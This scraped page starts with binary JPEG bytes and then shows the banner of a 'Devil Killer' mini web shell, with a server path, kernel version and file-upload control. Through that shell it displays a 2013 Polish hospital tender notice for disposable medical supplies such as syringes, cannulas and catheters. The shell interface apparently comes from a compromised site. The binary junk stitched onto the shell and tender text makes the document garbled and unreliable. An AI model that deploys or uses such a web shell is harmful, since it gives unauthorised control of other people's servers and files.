JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130226/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130226/30213-N-2013.html

<p class="kh_header"><b>Międzyrzec Podlaski: Przetarg nieograniczony na sukcesywne dostawy sprzętu medycznego jednorazowego użytku  dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej 
 w Międzyrzecu Podlaskim nr sprawy 3/2013</b><br>
<b>Numer ogłoszenia: 30213 - 2013; data zamieszczenia: 26.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Warszawska 2-4, 21-560 Międzyrzec Podlaski, woj. lubelskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozmc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na sukcesywne dostawy sprzętu medycznego jednorazowego użytku  dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej 
 w Międzyrzecu Podlaskim nr sprawy 3/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są sukcesywne dostawy strzykawek, igieł, wenflonów, cewników, drenów, rurek intubacyjnych, papierów rejestracyjnych, materiałów do sterylizacji i innego drobnego sprzętu medycznego jednorazowego użytku do SPZOZ w Międzyrzecu Podlaskim.
2. Zamówienie obejmuje dostawy według asortymentu i w ilościach wskazanych w formularzach cenowych od nr 1 do nr 12  stanowiących załączniki do SIWZ.
3. Wyszczególniony asortyment powinien posiadać najwyższe standardy jakościowe, oraz posiadać wszelkie dokumenty zezwalające na stosowanie w jednostkach służby zdrowia.
4. Zamówienia składane przez Zamawiającego będą wynikać z bieżących i uzasadnionych potrzeb, co jest równoważne z możliwością niezrealizowania przedmiotu umowy w ilościach i w zakresie wskazanym w formularzach cenowych.
5. Kod przedmiotu zamówienia CPV 33100000-1
6. Zamawiający  dopuszcza składania  ofert częściowych  z podziałem na poszczególne formularze cenowe.
7. Wymagania stawiane wykonawcy:
a) Wykonawca gwarantuje, że dostarczone wyroby będą wysokiej jakości oraz że są dopuszczone do obrotu i używania na terenie Polski zgodnie z obowiązującymi przepisami prawa. 
b) Wszystkie zaoferowane wyroby spełniają warunki określone w formularzach cenowych oraz niniejszym rozdziale.
c) Opakowanie musi zawierać informacje: nazwę producenta, nazwę produktu, ilość, numer serii, datę ważności.
d) Terminy ważności dostarczanych wyrobów nie mogą być krótsze niż co najmniej 2/3 okresu ważności podanej na opakowaniu.
e) Termin zapłaty za zrealizowane dostawy nie może być krótszy niż 30 dni od dnia złożenia zamawiającemu prawidłowo wystawionej faktury.
f) Wykonawca gwarantuje, że ceny jednostkowe, określone w formularzach cenowych nie wzrosną przez okres trwania umowy.
g) Wykonawca zobowiązuje się  dostarczyć  zamawianą partię  towaru własnym staraniem do magazynu Zamawiającego, w ciągu 4 dni roboczych, w godz. 8:00 - 14:00 poniedziałek - piątek.
8. Wzór umowy stanowiący załącznik nr 6 do specyfikacji istotnych warunków zamówienia jest integralną część niniejszej dokumentacji i zapisy w niej zawarte traktuje się jako warunki udzielenia zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>należy załączyć Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22. ust 1 pkt 1-4 ustawy Pzp załącznik  nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>należy załączyć Wykaz wykonanych dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie; odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia; z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców (min. 3 dostawy) oraz załączenie dokumentów potwierdzających, że te dostawy zostały wykonane należycie, (minimum 3 dokumenty)  zgodnie  z załącznikiem nr 4 do siwz.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w sytuacji, gdy będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów (niezależnie od charakteru prawnego łączących ich stosunków) jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia i przedstawi w tym celu, w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu przedmiotowego zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w sytuacji, gdy będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów (niezależnie od charakteru prawnego łączących ich stosunków) jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia i przedstawi w tym celu, w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu przedmiotowego zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w sytuacji, gdy będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów (niezależnie od charakteru prawnego łączących ich stosunków) jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia i przedstawi w tym celu, w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu przedmiotowego zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie że wszystkie zaoferowane wyroby medyczne są dopuszczone do obrotu i używania na terenie Polski zgodnie z obowiązującymi przepisami prawa - (zał.  nr 5 do siwz.)
Na każde żądanie Zamawiającego w czasie obowiązywania umowy, Wykonawca zobowiązuje się przedłożyć stosowne deklaracje zgodności, certyfikaty CE dla poszczególnych wyrobów medycznych.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzozmc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej
ul. Warszawska 2-4, 21-560 Międzyrzec Podlaski 
Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2013 godzina 12:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej
ul. Warszawska 2-4, 21-560 Międzyrzec Podlaski 
SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> sukcesywne dostawy sprzętu medycznego
 jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywne dostawy sprzętu medycznego jednorazowego użytku tj: 
Strzykawki 1 x uż. 2 ml op.	180      
Strzykawki 1 x uż. 5 ml op.	320      
Strzykawki 1 x uż. 10 ml op.	250      
Strzykawki 1 x uż. 20 ml op.	200      
Strzykawki 1 x uż. 50 ml (60 ml) szt.650      
Strzykawki 1 x uż. 50 ml (60 ml) BURSZTYNOWA	szt.	150      
Strzykawki 1 x uż. 100 ml szt.	150      
Strzykawki 1 x uż. (tuberkulinowa) z igłą. op.	5      
Igły 1 x uż. do strzykawek 0,5 x 25 (op. =100 szt)	op.	40      
Igły 1 x uż. do strzykawek 0,6 x 30 (op. =100 szt)	op.	20      
Igły 1 x uż. do strzykawek 0,7 x 30 (op. =100 szt)	op.	150      
Igły 1 x uż. do strzykawek 0,8 x 40 (op. =100 szt)	op.	350      
Igły 1 x uż. do strzykawek 0,9 x 40 (op. =100 szt)	op.	100      
Igły 1 x uż. do strzykawek 1,1 x 40 (op. =100 szt)	op.	40      
Igły 1 x uż. do strzykawek 1,2 x 40 (op. =100 szt)	op.	250      
Igły typu Motylek 0,7		szt.	150      
Igły typu Motylek 0.8		szt.	150      
Maska do podawania tlenu dla dzieci z drenem	szt.	100      
Cewnik do karmienia przez nos F5/400, 	szt.	100      
Cewnik do kontrolowanego odsysania górnych dróg oddechowych F8/400 szt.	700      
Cewnik do podawania tlenu przez nos,szt.	600      
Dren do ssaka (wąż) 9x5x1500, 	szt.	1000      
Dren sterylny do odsysania pola operacyjnego dł. 2 100 mm,  Śred. Wew. 8mm, szt.	150      
Filtr antybakteryjny, antywirusowy, elektrostatyczny bez nawilżacza, 	szt.	800      
Końcówka do odsysania pola operacyjnego typu Yankauer , z kontrolą siły ssania, zagięta, bez otworów odbarczających, duży przepływ 7 mm		szt.	150      
Końcówka do odsysania pola operacyjnego typu Yankauer,  z kontrolą siły ssania, standardowa, zagięta, z otworami odbarczającymi		szt.	150      
Korek do Venflonu szt.	2000      
Kranik trójdrożny	szt.	300      
Opaski do identyfikacji niemowląt, szt.	1500      
Opaski identyfikacyjne dla dorosłych szt.	1500      
Przedłużacz do pomp infuzyjnych dł. 150 	szt.	400      
Przedłużacz do pomp infuzyjnych dł. 150 cm . BURSZTYNOWY, szt. 200      
Przedłużacz tlenowy dł.  2100 mm,szt.	100      
Przewód ssący do końcówki do odsysania pola operacyjnego typ W8/3000,szt.	600      
Przyrząd do przetaczania krwi, komora kroplowa wolna od PCV,	szt.	350      
Przyrząd do przetaczania płynów infuzyjnych,szt.	15000      
Rurki ustno-gardłowe, 	szt.	80      
Ostrze chirurgiczne a 100 szt. Nr 10 (do trzonka nr 3), opis jw.		op.	2      
Ostrze chirurgiczne a 100 szt. Nr 15 (do trzonka nr 3), opis jw.		op.	2      
Ostrze chirurgiczne a 100 szt. Nr 20 (do trzonka nr 4), opis jw.		op.	15      
Ostrze chirurgiczne a 100 szt. Nr 21 (do trzonka nr 4), opis jw.		op.	20      
Kaniula pediatryczna typu Neoflon 24G, 0,7x19 mm, o przepływie 13 ml/min, (żółty), 	szt.	500      
Kaniula pediatryczna typu Neoflon, 26G, 0,6 x 19mm, o przepływie 13 ml/min, (fioletowy),   szt.	200      			
Kaniula 24G,  0,7 x 19 mm - żółta, 22ml/ min, opis jw.		szt.	600      
Kaniula  22G,  0,9 x 25 mm - niebieska, 36ml/min, opis jw.	szt.	4000      
Kaniula  18G, 1,3 x 45 mm - zielona,  96 ml/min, opis jw.  	szt.	250      
Kaniula  20G, 1,1 x 33 mm - różowy,  61 ml/min, opis jw.	szt.	3500      		
Cewnik do odsysania górnych dróg oddechowych nr 8,  		szt.	50      
Cewnik do odsysania górnych dróg oddechowych nr 10,		szt.	100      
Cewnik do odsysania górnych dróg oddechowych nr 12, 		szt.	500      
Cewnik do odsysania górnych dróg oddechowych nr 14, 		szt.	100      
Cewnik do odsysania górnych dróg oddechowych nr 16, 	szt.	100      
Rurki intubacyjne z mankietem niskociśnieniowym  nr  2,0 opis jw.		szt.	10      
Rurki intubacyjne z mankietem niskociśnieniowym  nr  2,5 opis jw.		szt.	10      
Rurki intubacyjne z mankietem niskociśnieniowym  nr  3,0 opis jw.	szt.	10      
Rurki intubacyjne z mankietem niskociśnieniowym  nr  3,5 opis jw.	szt.	10      
Rurki intubacyjne z mankietem niskociśnieniowym  nr  4,0 opis jw.	szt.	10      
Rurki intubacyjne z mankietem niskociśnieniowym  nr  4,5 opis jw.	szt.	10      
Rurki intubacyjne z mankietem niskociśnieniowym  nr  5,0 opis jw.	szt.	10      
Rurki intubacyjne z mankietem niskociśnieniowym  nr  6,0  opis jw.	szt.	10      
Rurki intubacyjne z mankietem niskociśnieniowym  nr  6,5  opis jw.	szt.	30      
Rurki intubacyjne z mankietem niskociśnieniowym  nr  7,0  opis jw.	szt.	100      
Rurki intubacyjne z mankietem niskociśnieniowym  nr  7,5  opis jw.	szt.	200      
Rurki intubacyjne z mankietem niskociśnieniowym  nr  8,0 opis jw.	szt.	150      
Rurki intubacyjne z mankietem niskociśnieniowym  nr  8,5  opis jw.	szt.	100      
Rurki intubacyjne z mankietem niskociśnieniowym  nr  9,0  opis jw.	szt.	20      
Zgłębnik żołądkowy nr 16 dł. 800 mm, opis jw.		szt.	20      
Zgłębnik żołądkowy nr 18 dł. 800 mm, opis jw.		szt.	30      
Zgłębnik żołądkowy nr 20 dł. 800 mm, opis jw.		szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> sukcesywne dostawy sprzętu medycznego
 jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywne dostawy sprzętu medycznego jednorazowego użytku tj:
Butelka do długotrwałego odsysania ran typu Redon 200 ml	szt.	200      
Cewnik Nelaton nr 10, .,szt.	10      
Cewnik Nelaton nr 12 .,szt.	10      
Cewnik Nelaton nr 14., szt.	30      
Cewnik Nelaton nr 16.,szt.	30      
Cewnik Nelaton nr 18., szt.	30      
Cewnik Nelaton nr 20., szt.	10      
Cewnik Thorax nr 32	szt.	10      
Cewnik Thorax nr 34	szt.	10      
Cewnik Thorax nr 36	szt.	10      
Cewnik Tiemann nr 10.,szt.	10      
Cewnik Tiemann nr 12., szt.	10      
Cewnik Tiemann nr 14., szt.	10      
Cewnik Tiemann nr 16., szt.	10      
Cewnik Foleya nr 8, opis jw	szt.	10      
Cewnik Foleya nr 10, opis jw.	szt.	10
Cewnik Foleya nr 12, 	szt.	10
Cewnik Foleya nr 14,.	szt.	20      
Cewnik Foleya nr 16, 	szt.	150      
Cewnik Foleya nr 18,	szt.	300      
Cewnik Foleya nr 20, 	szt.	300      
Cewnik Foleya nr 22, 	szt.	150      
Dren do jamy otrzewnej perforowany lateksowy Fx 320 rozmiar F24	szt.	10      
Dren do jamy otrzewnej perforowany lateksowy Fx 320 rozmiar F26	szt.	10      
Dren do jamy otrzewnej perforowany lateksowy Fx 320 rozmiar F28	szt.	10      
Dren do jamy otrzewnej perforowany lateksowy Fx 320 rozmiar F32 szt.	10      
Dren do jamy otrzewnej perforowany lateksowy Fx 320 rozmiar F34 szt.	10      	
Dren lateksowy  Kehr 70x16 nr 10, 	szt.	10      
Dren lateksowy Kehr 70x16 nr 12, 	szt.	10      
Dren lateksowy Kehr 70x16 nr 14, 	szt.	10      
Dren lateksowy Kehr 70x16 nr 16, 	szt.	10      
Dren perforowany REDON do odsysania ran nr 12 dł 500-700 mm		szt.	10      
Dren perforowany REDON do odsysania ran nr 14 dł 500-700 mm		szt.	10      
Dren perforowany REDON do odsysania ran nr 16 dł 700 mm		szt.	100      
Dren perforowany REDON do odsysania ran nr 18 dł 700 mm		szt.	100      
Dreny do zestawu dwubutlowego z regulacją		szt.	20      
Igła biopsyjna do szpiku kostnego 15G x 50mm		szt.	10      
Kateter(dren) perforowany do odsysania ran typu REDON nr 16 dł 500-700 mm w prostym opakowaniu		szt.	100      
Klipsy naczyniowe, tytanowe, typu: medium - large kompatybilne z klipsownicą STORZ 30444 LR, śr. 10mm - (posiadaną przez szpital ),        6 sztuk w opakowaniu		szt.	600      
